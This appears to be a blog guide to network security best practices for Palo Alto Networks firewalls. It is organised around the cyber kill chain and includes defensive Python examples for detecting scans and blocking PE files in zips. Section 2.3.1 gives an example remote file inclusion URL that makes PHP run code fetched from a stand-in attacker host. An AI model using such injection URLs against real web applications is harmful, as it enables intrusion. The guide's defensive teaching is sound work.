Network Security Best Practices for Palo Alto Networks Next-Generation FireWalls

We put our five years of experience in designing, implementing, supporting and managing Palo Alto Networks solutions together and wrote this guide to share our best practices to secure an enterprise network using Palo Alto Networks Next-Generation FireWalls.


The single most important message which we would like to bring across is that there is no magic box that does everything on its own: any threat prevention technique like AV, IPS or URL Filtering can be evaded and as such doesn’t provide 100% security on its own. The solution is what I like to call the magic sauce, which is to put the right combination of threat prevention techniques together to make it close to impossible for an attacker to evade all of them. This is what this blog post is all about: to provide an overview of the approaches used by hackers to infiltrate a network and to explain the threat prevention techniques and best practices to mitigate attacks.


If you are interested in learning more, then you should also consider our official Palo Alto Networks training, like the new PAN-EDU-231 Advanced Threat Management course, where we teach you the insights and best practices on cyber threats and how to protect your enterprise network effectively in real life.


1. Summary


The main objective of this document is to provide enterprises with a framework under which they can implement and maintain security best practices to defend their network and valuable IT infrastructure.


Information security requires a holistic approach that involves many areas of information technology. In this document, we are focusing on network security and the different threat prevention techniques used to defend against Advanced Persistent Threats “APTs”.


The Cyber Kill Chain, a term first used by Lockheed Martin, describes the sophisticated, stealthy and continuous computer hacking process which attackers use nowadays to target their victims. The challenge for any hacker is to successfully go through every single stage in this chain to accomplish the end goal of either attacking the IT infrastructure directly or using the infrastructure as a resource for other criminal activity. The challenge for the company is to defend each link and stop the attack at the earliest possible stage along the kill chain, successfully defending itself against the entire Advanced Persistent Threat. In reality, however, 100% security is not possible: every threat prevention technique can be evaded, and cyber criminals have been very successful at doing so. For instance, a recent whitepaper from the SANS Institute, “Beating the IPS”, shows that every Intrusion Prevention System “IPS” from every vendor can be evaded.

A good analogy is the human immune system. A healthy lifestyle will keep us fit, but there is, for example, no total protection from viral infection. However, being sick isn’t the end of the world as long as the body is able, or sometimes with medical intervention enabled, to effectively defend itself and mitigate the impact of the infection. There is however a big difference between us humans and an IT system. We know when we feel sick and we instinctively know when to go to the doctor. Getting this level of intelligence into an IT infrastructure is difficult and expensive.


Enterprises should therefore adopt the approach of visibility, control and threat prevention. The Palo Alto Networks Next-Generation FireWall can provide the visibility necessary to allow a company to determine exactly what needs to be protected. Controlling the use of applications will not only ensure appropriate usage of the network but also reduce the attack surface, which establishes the foundation for a secure network. The final step is to implement different threat prevention techniques at every step of the cyber kill chain, as it is the combination of different threat prevention techniques which reduces the ability to evade all of them and in turn provides the enterprise with the best possible security defence.


This document focuses on the two main targets of the IT infrastructure, the data centre and end-user devices. In order to secure these targets, enterprises need to understand where the risk exists and how they might be attacked. Therefore we will first outline the common techniques used by attackers along the cyber kill chain to infiltrate these targets and then describe the recommended threat prevention techniques which should be implemented and maintained to defend them.


Table of Contents


1. Executive Summary
2. Data Center

2.1. Kill Chain Step 1 – Reconnaissance
2.2. Kill Chain Step 2 – Weaponization
2.3. Kill Chain Step 3 – Delivery
2.4. Kill Chain Step 4 – Exploitation
2.5. Kill Chain Step 5 – Installation
2.6. Kill Chain Step 6 – Command and Control (C2)
2.7. Kill Chain Step 7 – Actions on Objectives

3. End-user Devices

3.1. Kill Chain Step 1 – Reconnaissance
3.2. Kill Chain Step 2 – Weaponization
3.3. Kill Chain Step 3 – Delivery
3.4. Kill Chain Step 4 – Exploitation
3.5. Kill Chain Step 5 – Installation
3.6. Kill Chain Step 6 – Command and Control (C2)
3.7. Kill Chain Step 7 – Actions on Objectives

4. Monitoring

4.1. Reporting

2. Data Centre


Data centres, and by this we mean servers or any other devices which are not directly operated by a human, generally provide services and therefore have to be available to a wide audience. This presents a broad threat surface because the server has to process the data it receives, including malicious input which attackers can use to exploit software vulnerabilities. Data centres therefore share a common threat vector: they provide services based on software which by its nature has bugs, or even features, which adversaries can exploit. Once this has been accomplished, the intruder gets access to the system, where he can take actions to realise his objectives, which might be to violate the confidentiality, integrity or availability of a system or to move laterally inside the network.


2.1. Kill Chain Step 1 – Reconnaissance
At the Reconnaissance stage, the attacker is still acting outside the trusted environment to which he tries to gain access.


2.1.1. Possible Action by the Attacker (Risks)
At this stage, the intruder tries to gather information in order to identify and select a possible target.


Possible attacks are:

  • Host Sweep – Scan of a range of IP addresses to identify live hosts
  • Port Scan – Scan of a range of TCP or UDP ports to identify services running on the host
  • Information Disclosure Attack – Scan of a service to acquire system-specific information like the software vendor, name and version which could be used to identify possible vulnerabilities of the specific software


2.1.2. Threat Prevention Techniques for Mitigation & Defence

  • Zero Trust Access Control – Services should only be made available to the users who need to access them. Such access can be controlled by the security policy to allow communications only from the required sources. Where a service needs to be made available to the internet, access can be restricted on a per-country basis. Either site-to-site VPN tunnels or the GlobalProtect remote access VPN should be used to provide access to services for a manageable group of third parties instead of allowing direct access from the internet. This especially applies to services that provide direct system access like remote desktop, telnet or SSH, as these are prone to brute-force attacks.
  • Block access from high-risk sources – Attacks are often launched from what can be called the bad neighbourhoods of the internet. These are often countries with a high infection rate of devices under the control of cybercriminals (“BotNets”). If access to a service cannot be limited to specific countries, then communication should be blocked from countries where attacks are seen but no legitimate customer requests can be expected. Instead of blocking entire countries, blocking access from blacklisted IP addresses should be considered, as a large percentage of attacks originate in high-profile countries like the United States, Germany and the UK, from which services often have to be reachable. IP blacklists are available from organisations such as OpenBL or similar commercial services. The Next-Generation FireWall can automatically update such blacklists by using the “Dynamic Block Lists” feature.
  • Application Control (Inbound) – One of the most effective methods to prevent network threats is the implementation of a positive application allow list, as it significantly reduces the attack surface and with this the attack-ability of a service. With such application-based access control, only applications that are explicitly configured in the security policy are allowed and consequently all others are blocked. Data centres usually provide a set list of applications which can easily be identified using the reporting capabilities of the Next-Generation FireWall. Caution should be taken when analysing the traffic log with any application which has generated a high number of sessions but a small volume of traffic, as such communications, especially inbound from the internet, could have been attempts by intruders to scan internet-facing services for vulnerabilities. Some legitimate business applications may not be identified by the Next-Generation FireWall as they might be proprietary or not widely used applications. Before blocking any unknown applications, it is therefore important to identify such legitimate applications and allow them by defining a custom application signature. Application override should not be used for any internet-facing services, as this disables security profiles and with this the capability to scan the traffic for known threats.
  • Zone Protection – Reconnaissance protection is part of the zone protection profile and can detect and block host sweeps as well as TCP and UDP port scans. Zone protection profiles are applied to the zone where the traffic enters the FireWall. It is highly recommended to enable this feature on external zones. For internal zones, however, it needs to be verified that the settings will not negatively affect any monitoring tools, which often use the same scanning techniques to determine whether servers and services are up and running. The standard thresholds are a good starting point. However, they should be tuned: change the action to alert, lower the threshold and monitor the threat log to verify whether any legitimate communications raise an alert.
  • Vulnerability Protection – A vulnerability protection profile should be applied to detect and block information leakage attacks.
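
As an added example (not code from this page or from Palo Alto Networks), the script below applies the two reconnaissance heuristics from the list above to an exported traffic log: the “many sessions, little traffic” pattern from the application control point and the host-sweep / port-scan thresholds from the zone protection point. The CSV layout (src,dst,dport,app,bytes), every address and the threshold values are constructed for this example and are not the real PAN-OS traffic log field order.

```python
"""
Triage of an exported traffic log for reconnaissance patterns.

Added example, not Palo Alto Networks code. The CSV layout
(src,dst,dport,app,bytes) and every address below are constructed for
this example; a real PAN-OS traffic log has a different field order.
"""
import csv
import io
from collections import defaultdict


def build_sample_log() -> str:
    """Constructed sample sessions, not captured traffic."""
    rows = []
    # Port scan: one source, one target, many ports, tiny sessions.
    for port in range(20, 32):
        rows.append(f"203.0.113.9,198.51.100.10,{port},unknown-tcp,60")
    # Host sweep: one source, many targets, one port, tiny sessions.
    for host in range(1, 12):
        rows.append(f"203.0.113.77,198.51.100.{host},443,ssl,120")
    # Legitimate client: few sessions that actually move data.
    for _ in range(3):
        rows.append("192.0.2.5,198.51.100.10,443,ssl,250000")
    return "src,dst,dport,app,bytes\n" + "\n".join(rows) + "\n"


def parse_log(text: str) -> list:
    """Parse the constructed CSV into dicts with numeric port and bytes."""
    return [
        {"src": r["src"], "dst": r["dst"], "dport": int(r["dport"]),
         "app": r["app"], "bytes": int(r["bytes"])}
        for r in csv.DictReader(io.StringIO(text))
    ]


def find_reconnaissance(rows, min_sessions=10, max_avg_bytes=500,
                        min_ports=10, min_hosts=10) -> dict:
    """
    Group sessions per source and flag sources that open many sessions
    but move almost no data. The thresholds are assumed starting values,
    to be tuned the same way as a zone protection profile: alert first,
    then compare against the threat log before lowering them.
    """
    per_src = defaultdict(lambda: {"sessions": 0, "bytes": 0,
                                   "ports": set(), "hosts": set(),
                                   "apps": set()})
    for r in rows:
        s = per_src[r["src"]]
        s["sessions"] += 1
        s["bytes"] += r["bytes"]
        s["ports"].add(r["dport"])
        s["hosts"].add(r["dst"])
        s["apps"].add(r["app"])

    findings = {}
    for src, s in per_src.items():
        if s["sessions"] < min_sessions:
            continue
        avg_bytes = s["bytes"] / s["sessions"]
        if avg_bytes > max_avg_bytes:
            continue  # many sessions but real payload: probably legitimate
        reasons = ["many-sessions-little-data"]
        if len(s["hosts"]) >= min_hosts:
            reasons.append("host-sweep")
        if len(s["ports"]) >= min_ports:
            reasons.append("port-scan")
        if "unknown-tcp" in s["apps"] or "unknown-udp" in s["apps"]:
            reasons.append("unknown-application")
        findings[src] = {"sessions": s["sessions"],
                         "avg_bytes": round(avg_bytes),
                         "hosts": len(s["hosts"]),
                         "ports": len(s["ports"]),
                         "reasons": reasons}
    return findings


if __name__ == "__main__":
    for src, f in find_reconnaissance(parse_log(build_sample_log())).items():
        print(src, f)
```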


2.2. Kill Chain Step 2 – Weaponization
Weaponization is the stage where the adversary is preparing the exploit as a deliverable payload. This stage does not involve any communication by the attacker and as such cannot be directly prevented but also does not impose any direct risks. However, enterprises should note that the threat landscape has changed tremendously over the last couple of years. We are now seeing highly sophisticated attacks executed by novices simply made possible by the new business model of cybercrime “Hacking as a Service”. Instead of taking the risk of attacking themselves, incredibly skilled and intelligent hackers now earn money by developing easy to use tools that enable less-skilled criminals to weaponise themselves for the execution of sophisticated attacks.


2.3. Kill Chain Step 3 – Delivery
At this stage, the attacker tries to deliver the malicious code to the target. This is the transition stage where the attack goes from the outside to the inside.


2.3.1. Possible Action by the Attacker (Risks)

Common attacks at this stage are:

  • Code Execution – Code execution describes an attack where the attacker is able to inject malicious code into an application, which is then interpreted/executed by the application. This type of attack exploits poor handling of untrusted data and is usually made possible by a lack of proper input/output data validation. For example, if a web application passes a parameter sent via an HTTP GET request to the PHP include() function with no input validation, the attacker may try to execute code other than that which the developer had in mind. So for instance the normal URL could look like “http://testsite.com/index.php?page=contact.php” and an attacker could change it to something like “http://testsite.com/?page=http://evilsite.com/evilcode.php” to try to instruct PHP to run the attacker’s own malicious code instead. With code execution, an attacker is limited by the functionality of the language into which the code was injected, which limits what this attack can be used for. However, the attack surface or exposure is very high, as every web application can be targeted by such an attack.
  • Command Execution – With command execution, an attacker tries to execute arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data like form fields, cookies or HTTP headers to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation. This attack differs from code execution in that code execution has the application execute the attacker’s own code, while command execution runs operating system commands.
  • SQL Injection – A SQL injection is a specific type of command execution attack which consists of the injection of a SQL query via the input data from the client to the application. A successful SQL injection exploit can, for instance, read sensitive data from the database, modify database information, execute administration operations on the database and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.
  • Buffer Overflow – A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold, or when a program attempts to put data in a memory area past a buffer. In this case, a buffer is a sequential section of memory allocated to contain anything from a character string to an array of integers. Writing outside the bounds of a block of allocated memory can corrupt data, crash the program or cause the execution of malicious code. So for instance an attacker can use a buffer overflow to corrupt the execution stack of a web application by sending crafted input, which can then cause the web application to execute malicious code.


2.3.2. Threat Prevention Techniques for Mitigation & Defence

  • SSL Decryption (SSL Inbound Inspection) – SSL is widely used to secure communications in order to guarantee the authenticity, integrity and confidentiality of the transferred data. However, this also means that if an application uses SSL then all the data transferred over the firewall is encrypted. Therefore SSL inbound inspection should be enabled, especially for all Internet-facing applications. With this, the firewall will decrypt the data, which enables it to identify applications inside the SSL tunnel as well as block the various types of attacks. Please note that the number of SSL inbound certificates is limited. For instance, the PA-3020 supports up to 25 SSL inbound certificates, which means that inbound SSL decryption can be enabled for up to 25 different domain names.
  • IPS – An IPS Vulnerability profile should be applied to detect and block the various types of known attacks described above. Dedicated profiles with a more rigid policy should be applied to internet-facing applications. As a starting point, it is recommended to block any threats with a severity of critical, high and medium for host type server, which means that these apply to all traffic sent from a client on the internet to the webserver. Critical threats for host type client (traffic sent by the server to the client) should be blocked as well, while the action for all other severities and types should be set to follow the default action. Further customization based on the detected threats is highly recommended. Packet captures should be enabled in each vulnerability protection rule, as these capture the malicious code which was sent by the attacker and so provide additional information for analysis as well as proof of the attack.

2.4. Kill Chain Step 4 – Exploitation
At this stage, the malicious code has been delivered to the target where it can attempt to trigger exploitation of a vulnerability and the attacker is now acting inside the trusted environment. An exploit is a sequence of commands that takes advantage of a bug or vulnerability in a software application or process. Attackers use exploits as a tool to access and use a system to their advantage. To gain control of a system, the attacker must bypass a chain of vulnerabilities in the system. Blocking any attempt to exploit a vulnerability in the chain will block the exploitation attempt entirely.


The transfer of the malicious code traverses the firewall at the previous stage, where it will be blocked only if the malicious code triggers a signature match of a known threat. The exploit itself, however, can only be detected and blocked on the end system, e.g. the server itself, and as such is outside the control of the firewall. The prevention of exploits on the target is therefore outside the scope of this document. However, we would still like to point out possible solutions like the Palo Alto Networks Advanced Endpoint Protection called “Traps”.


In a typical attack scenario, an attacker attempts to gain control of a system by first attempting to corrupt or bypass memory allocation or handlers. Using memory-corruption techniques such as buffer overflows and heap corruption, the hacker can then trigger a bug in the software or exploit a vulnerability in a process. The attacker must then manipulate a program to run code provided or specified by the attacker and evade detection. If the attacker gains access to the operating system, the attacker could then upload Trojan horses, malware programs that contain malicious executables, or otherwise use the system to their advantage, which is the next step in the kill chain (step 5, installation).


Classical AntiVirus solutions employ signatures to identify executables, dynamic-link libraries (DLLs), or other pieces of code as malicious. The weakness of this method is that signature-based solutions first need to identify newly created threats (also known as Zero-Day attacks or exploits) and then add them to lists of known threats before they will be detected, leaving the endpoint vulnerable until the signatures are updated.


Attackers rely on a small number of exploit techniques like buffer overflows and heap sprays to trigger a bug in the software. Palo Alto Networks’ “Traps” prevents exploit attempts by blocking these exploit techniques rather than trying to identify the malware based on its signature, which makes it possible to block even zero-day attacks and vulnerabilities which are still unknown.

When a service starts on the server the Traps agent seamlessly injects drivers into the software process at the earliest possible stage before any files belonging to the process are loaded into memory. If the process then opens the file, Traps injects a code module called an Exploitation Prevention Module (EPM) into the process. The EPM targets a specific exploitation technique and is designed to prevent attacks on program vulnerabilities based on memory corruption or logic flaws.


Examples of attacks that the EPMs can prevent include:

  • Memory corruption
  • Java code from running in browsers, under certain conditions
  • Executables from spawning child processes, under certain conditions
  • Dynamic-link library (DLL) hijacking (replacing a legitimate DLL with a malicious one of the same name)
  • Hijacking program control flow
  • Inserting malicious code as an exception handler


In addition to automatically protecting processes from such attacks, Traps reports any prevention events to the Endpoint Security Manager and performs additional actions according to the settings of the policy rules. Common actions performed by Traps include collecting forensic data and notifying the user about the event. Traps neither relies on nor performs any additional scanning or monitoring actions, which makes it a lightweight application with very little CPU and memory usage.


2.5. Kill Chain Step 5 – Installation
At stage 5, the attacker tries to install a remote access trojan “RAT” or backdoor on the target to maintain persistence inside the environment. At this point, it is important to understand the difference between an exploit which we described in the previous two stages and executable malware like a Trojan or backdoor. For an advanced persistent threat, the attacker needs to establish persistence on the target which means that he has to establish full remote access and control on the victim’s device while evading detection. At the exploit stage, the attacker is however still limited by the functionality of the language into which the code was injected. Even shell access, which he might have gained through a command execution attack, is still limited to the operation of the shell of the operating system which does not provide any advanced functionality like key-logging. In addition, such shell access is usually logged, which makes it difficult to evade detection. Therefore the attacker relies on the download of additional executable software like a Remote Access Trojan “RAT” which will provide all the necessary functionality to gain full remote access independent of the exploited application as well as additional tools to for instance monitor the victim’s activity.


2.5.1. Possible Action by the Attacker (Risks)
At the installation stage, the attacker uses the elevated access which he has gained through the previous exploitation stage to execute commands or code which instructs the target device to download the RAT or backdoor. The biggest risk exists if a server has internet access, because it means that the server itself can establish a connection to the internet to download the malware. Most servers require internet access to download updates. This is important, as software updates are still one of the cornerstones of a secure IT infrastructure: they reduce the attack surface by patching security vulnerabilities. However, if a legacy port-based firewall allows Internet access to the server, then it will also allow the download of malware from any source on the Internet. Restricting access based on destination IP addresses is usually not an option, as legitimate applications like Microsoft Update use content delivery networks with randomly changing IP addresses.


Once downloaded, the RAT will install itself, often with rootkit capabilities, which enable the malware to embed itself deeply and stealthily into the operating system. Because of this, it evades detection by hiding the existence of certain processes or programs. Most AntiVirus solutions will neither be able to detect nor remove such rootkit-enabled RATs.


2.5.2. Threat Prevention Techniques for Mitigation & Defence

  • Application Control (Outbound) – One of the most effective methods of preventing network threats is the implementation of a positive application allow list, as it significantly reduces the attack surface and with this the attack-ability of a network. With this, only applications that are explicitly configured in the security policy are allowed and consequently all others are blocked. For internet access, servers usually require only a relatively small number of applications like “ms-update” and other software update applications. If only such specific applications are allowed, then general file download applications like FTP, web-browsing, SSL or ssh, which attackers often try to use to download malware, are blocked automatically. Please note that SSL decryption is required to identify applications inside any HTTPS-based communication.
  • URL Filtering – URL Filtering is another way to restrict the services that can be accessed on the internet, especially if general web applications like “web-browsing” or “SSL” have to be allowed. For data centres, explicit custom URLs should be defined and used in the security policy as match criteria so that servers are allowed access only to specific URLs. If broader access is required, then high-risk categories like malware, dynamic-DNS, web-advertisements, unknown, proxy-avoidance-and-anonymizers, phishing, peer-to-peer, parked and hacking should be blocked.
  • File Blocking – File Blocking is one of the most reliable threat prevention techniques at this stage of the kill chain, as it is capable of blocking the download of executable files. This is important because the advanced functionality of a RAT can only be delivered in the form of fully compiled software, a portable executable “PE” file. A file blocking profile should therefore be applied to all security policies which allow Internet access, to block the download and upload of “PE” files. The Next-Generation FireWall will also detect PE files inside zip files and, if detected, block the entire zip file. Data inside encrypted files like “encrypted-zip” or “encrypted-rar” cannot be decrypted and should therefore also be blocked. The download of legitimate files from trusted sources can explicitly be allowed through dedicated security policies based on applications and URLs. Please note that SSL decryption is required to analyse files inside any HTTPS-based communication.
  • Anti-Virus & Anti-Spyware – If file downloads are allowed from trusted sources, then these files should still be scanned by an Anti-Virus and Anti-Spyware profile, because there is no guarantee that, for instance, the webserver of a trusted partner or even a high-profile company will not be compromised by malware. Please note that Anti-Virus and Anti-Spyware are only capable of blocking already known malware, and SSL decryption is required to scan files inside any HTTPS-based communication.
  • Zero-day malware detection and prevention (WildFire) – Classical AntiVirus solutions provide only limited protection against modern malware, as such malware is highly polymorphic, i.e. it constantly changes its signature to avoid detection by signature-based AntiVirus. If file downloads are allowed from trusted sources, these files should also be analysed by WildFire, because there is no guarantee that, for instance, the webserver of a trusted partner or even a high-profile company will not be compromised by malware. At the same time, there is a high probability that the malware is not detected by classical Anti-Virus. WildFire extends the Next-Generation FireWall to identify and block targeted and unknown (0-day) malware by actively analysing unknown files in a safe, cloud-based virtual environment, where Palo Alto Networks can directly observe malicious behaviours. WildFire automatically generates protections for newly discovered malware and delivers these protections globally, enabling all customers to benefit from the analysis. A basic WildFire service is included in the base system of the Next-Generation FireWall to analyse PE files, while signature updates are delivered on a daily basis as part of the threat prevention subscription. Immediate delivery of signatures (every 15 minutes), as well as the analysis of Java, Flash, PDF, Microsoft Office and Android APK files and e-mail links, requires an additional WildFire subscription. Please note that SSL decryption is required to analyse files inside any HTTPS-based communication.
  • SSL Decryption (SSL Forward Proxy) – SSL decryption should be enabled, especially for all communication with the Internet. This will allow the firewall to decrypt the data, which enables it to identify applications and malware inside the SSL tunnel as well as block high-risk files.
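
The File Blocking point above makes two decisions: a PE file found inside a zip blocks the whole archive, and an encrypted member cannot be inspected and is blocked as well. The following is an added example (not this page’s or Palo Alto Networks’ code) that reproduces both decisions with the Python standard library, identifying the PE by its content (MZ header and PE signature) rather than by file name; the archives and the PE-shaped payload are constructed for the example.

```python
"""
Content-based check of a downloaded ZIP for PE files and encrypted members.

Added example, not Palo Alto Networks code: it reproduces the decision the
text describes (PE inside zip -> block the whole archive; encrypted member
-> block) with the standard library. All archives and payloads are constructed.
"""
import io
import struct
import zipfile

# Leading bytes read per member; enough to follow e_lfanew in normal PE files.
HEAD_BYTES = 4096


def looks_like_pe(head: bytes) -> bool:
    """True if the data starts with a DOS "MZ" header whose e_lfanew field
    (offset 0x3C) points at the "PE\\0\\0" signature. The check is on content,
    so renaming setup.exe to invoice.pdf does not hide the file."""
    if len(head) < 0x40 or head[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", head, 0x3C)[0]
    return head[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def member_is_encrypted(info: zipfile.ZipInfo) -> bool:
    """Bit 0 of the general-purpose flag marks an encrypted member,
    whatever the encryption method (ZipCrypto or AES)."""
    return bool(info.flag_bits & 0x1)


def inspect_archive(data: bytes) -> dict:
    """Return {"action": "allow"|"block", "reasons": [...], "members": [...]}."""
    verdict = {"action": "allow", "reasons": [], "members": []}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        verdict["action"] = "block"
        verdict["reasons"].append("not-a-valid-zip")
        return verdict
    with zf:
        for info in zf.infolist():
            entry = {"name": info.filename, "encrypted": False, "pe": False}
            if member_is_encrypted(info):
                # Cannot be inspected, so it is treated like encrypted-zip.
                entry["encrypted"] = True
                verdict["reasons"].append(f"encrypted member: {info.filename}")
            elif not info.is_dir():
                with zf.open(info) as fh:
                    entry["pe"] = looks_like_pe(fh.read(HEAD_BYTES))
                if entry["pe"]:
                    verdict["reasons"].append(f"PE member: {info.filename}")
            verdict["members"].append(entry)
    if verdict["reasons"]:
        verdict["action"] = "block"   # one bad member blocks the whole zip
    return verdict


def build_fake_pe() -> bytes:
    """Constructed PE-shaped blob (MZ stub + PE signature), not a real binary."""
    blob = bytearray(0x84)
    blob[0:2] = b"MZ"
    struct.pack_into("<I", blob, 0x3C, 0x80)   # e_lfanew -> offset 0x80
    blob[0x80:0x84] = b"PE\0\0"
    return bytes(blob)


def build_zip(members: dict) -> bytes:
    """Constructed in-memory archive from {name: payload}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, payload in members.items():
            zf.writestr(name, payload)
    return buf.getvalue()


if __name__ == "__main__":
    print(inspect_archive(build_zip({"readme.txt": b"hello"})))
    print(inspect_archive(build_zip({"invoice.pdf": build_fake_pe()})))
```

The standard library cannot write encrypted archives, so the encrypted-member branch is exercised through the flag bit on a `ZipInfo` rather than a real password-protected zip.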


2.6. Kill Chain Step 6 – Command and Control (C2)


At the command and control stage, the remote access trojan “RAT” on the compromised host will establish a communication channel to the attacker’s command and control “C2” server. Once the C2 channel has been established, the intruder has “hands on the keyboard” access to the compromised host inside the target environment.


2.6.1. Possible Action by the Attacker (Risks)

Persistence is one of the main objectives of an APT. This means in case the command and control “C2” server is no longer reachable, because for instance it has been taken down by law enforcement, then the RAT on the compromised host has to again establish a C2 channel to a new C2 server in order for the attacker to re-establish control. Attackers achieve this resilience by using DNS which easily enables them to point their command and control domain to a new IP address. More sophisticated malicious operations on the internet even use a technique called “Fast-flux” which constantly changes the mapping of the IP address to the domain. This enables the attacker to build a network that obscures his true location as all connections are proxied through a constantly changing layer of IP addresses.


Once the RAT has resolved the IP address of its C2 server via DNS it will establish the C2 channel. Blocking these C2 channels can be challenging with legacy port-based firewalls as applications can use any TCP or UDP port number to communicate and therefore the assumption, based on which port-based firewalls are designed, that a specific port equals a specific application is no longer true. The same applies to command and control communication of malware which often uses port numbers of common applications like web-browsing (port 80) or DNS (port 53) to evade detection.


2.6.2. Threat Prevention Techniques for Mitigation & Defence

  • Application Control (Outbound) – The Next-Generation FireWall identifies any type of network communication as an application, independently of the port. It is obviously impossible to know every application which could possibly exist, and therefore all network communications which cannot be associated with a known application will be identified as either “unknown-udp” or “unknown-tcp”. Blocking these unknown applications is one of the most effective prevention techniques for command and control traffic, as C2 channels are mostly proprietary applications which are identified as unknown by the Next-Generation FireWall and therefore blocked, even if it is a completely new type or zero-day command and control application which hasn’t been seen before.
  • DNS Sinkhole – Palo Alto Networks identifies malicious command and control domains using its threat intelligence cloud “WildFire”. Once WildFire identifies new malware based on its behaviour, it also knows the domain to which the malware attempted to connect to establish a command and control channel. These domains are then delivered to the firewall as part of the Anti-Spyware protection, which enables the firewall to block them. A challenge which arises out of this, however, is that most devices send DNS queries to a DNS server. The DNS server then sends these queries over the firewall to the internet. If the firewall blocks a DNS request for a malicious domain, then the originator it sees is the DNS server and not the compromised host. DNS sinkholing is an additional feature which solves this visibility problem by forging responses to the client host’s queries for malicious domains. Clients attempting to connect to malicious domains for command and control will instead connect to a sinkhole IP address defined by the administrator. Infected hosts can then be easily identified in the traffic logs, as any host that attempts to connect to the sinkhole IP address is most likely infected with malware.
  • Anti-Spyware – Similar to command and control domains, WildFire also identifies the command and control channel communication of newly identified malware. Signatures for such command and control traffic are then delivered to the firewall as part of the Anti-Spyware protection, which enables the firewall to block them.

 

2.7. Kill Chain Step 7 – Actions on Objectives

 

Only at the last stage, after progressing through the first six phases, can intruders take actions to achieve their original objectives.

 

2.7.1. Possible Action by the Attacker (Risks)

Typically, the objective of the attacker at this stage is data exfiltration. This involves collecting, encrypting and extracting information from the victim environment; violations of data integrity and/or availability are also potential objectives. Alternatively, the intruders may only desire access to the initial victim device for use as a hop point to compromise additional systems and move laterally inside the network, or simply use the compromised host for other criminal activity like sending out spam e-mails, participating in click fraud or launching denial-of-service attacks against other victims.

2.7.2. Threat Prevention Techniques for Mitigation & Defence

  • Zero Trust – At stage 7, the host has been fully compromised and is under total control of the attacker. The best defence strategy at this stage to “Survive” is by limiting the possible damage. So for instance a web server is highly exposed to attacks as it is directly reachable from the internet but compromising a single web server might not be sufficient for the attacker to achieve its objective of data exfiltration as the valuable data is mostly stored on the application and database servers. Granular network segmentation based on a Zero Trust Architecture with the principles of “Never Trust – Always Verify” will contain the attack at a boundary that will limit the possible damage.
  • Data Filtering – The Next-Generation FireWall provides the capability to identify and block unique data patterns in network communication. This data filtering feature can be used to identify and stop the exfiltration of data. The functionality can be compared to a data loss prevention “DLP” solution even though it is not as extensive.

 

3. End-user Devices

 

End-user devices, which can be fixed or mobile devices, share a common threat vector as they are all operated by a human being. Such end-user devices usually do not host any services, which significantly reduces the attack surface: an attacker cannot simply send malicious code directly to the device to exploit a software vulnerability, as we have seen in the previous section. Therefore the first step for an attacker is to target the human factor by baiting the user into initiating the compromise, either by clicking on a link, opening a file, or any other activity which enables the attacker to load malicious code onto the device.

 

In 2011, RSA was the target of a spear-phishing attack made successful by just one employee opening the malicious attachment even after their spam filter had correctly placed the email in the “junk” folder. RSA suffered a severe data breach as a result.

 

Educating users on cybersecurity is important but there is no 100% immunity against social engineering in the same way that there is no total protection from any threat prevention technique on its own. So blaming the end-user is not the solution as he is only one element in the chain and the attacker still has to successfully go through several other stages to accomplish his objective. For this reason, the same principle applies to end-user devices, that is, only a combination of different threat prevention techniques aligned in the right way at every stage of the cyber kill chain will provide an adequate defence.

 

3.1. Kill Chain Step 1 – Reconnaissance

At the Reconnaissance stage, the intruder tries to gather information in order to identify and select a possible target. This stage does not involve any direct communication by the adversary to the target and as such cannot be prevented by the Next-Generation FireWall. However, it still has to be taken seriously as a couple of basic preventative measures by the user can avoid an attack even at this early stage.

 

Based on the objectives of the adversary we need to differentiate if the enterprise could be a direct or indirect target. As a direct target, the adversary’s specific objective is to infiltrate the company directly to for instance extract or manipulate data. As an indirect target, the attacker’s main objective is to take control of any available device to use for other criminal activity. This makes everyone a potential target even if there are no obvious reasons to infiltrate an enterprise directly.

 

Exploiting the human factor, the most effective attacker strategy is a spear-phishing attack, targeting a specific individual or group of people in a specific organisation. So if an attacker has an objective to infiltrate a specific company then he will explore the interests of his target to make a phishing e-mail look more authentic by appearing to originate from a legitimate organization or individual and contain role-relevant or topic-of-interest content to entice its intended target. Preventing a direct attack at this early stage of reconnaissance is close to impossible because every enterprise and individual has freely available information about themselves which can be used by adversaries.

 

With an indirect attack, however, the intruder takes more of an opportunistic approach where he tries to find as many targets as possible for instance by crawling the web for e-mail addresses and then focuses on the weakest possible target. With this users can take simple measures to protect their private data like for example, not making their e-mail address freely available.

 

3.2. Kill Chain Step 2 – Weaponization

 

Weaponization is the stage where the adversary is preparing an exploit as a deliverable payload, like for instance preparing an e-mail with a malicious attachment. This stage does not involve any communication by the attacker and as such cannot be directly prevented, but it also does not impose any direct risks. It is however still important to have an understanding of the techniques employed by the attacker at this stage. The following is a real-life example of an “Infostealer Campaign” taken from the Palo Alto Networks Blog which illustrates the craftsmanship of the attacker at the weaponization stage and the power of social engineering to influence a person.

 

The campaign started with an email sent to an employee responsible for processing financial statements at a global financial organization (Figure below). The sender’s email address was spoofed as originating from an energy company. The subsequent analysis would show that this façade was very thin; yet, it is often all that is required to encourage a user to open an attachment or click on a link that then executes malicious code.

 

This e-mail employs common pressure tactics for phishing messages. Specifically, it touches on two areas of potential concern for a target: financial responsibility and the introduction of a state of uncertainty and confusion. In this case, the role of the target as a processor of financial statements might mean that the target is accustomed to receiving similarly structured legitimate e-mails; accordingly, they may open a malicious attachment without a second thought.

 

The second factor is much broader and relates to how humans deal with uncertainty. Without specific awareness and training, some users may be inclined to open the attachment, wondering why the e-mail was sent to them. In psychology, this is referred to as the “Need for Closure” personality trap.

 

The next layer of this attack is found within the malicious DOC file once a victim opens it. With a system properly configured to protect against automatic execution of macros, no malicious code has been run at this point. The Figure below presents a screenshot of the malicious attachment’s displayed contents.

 

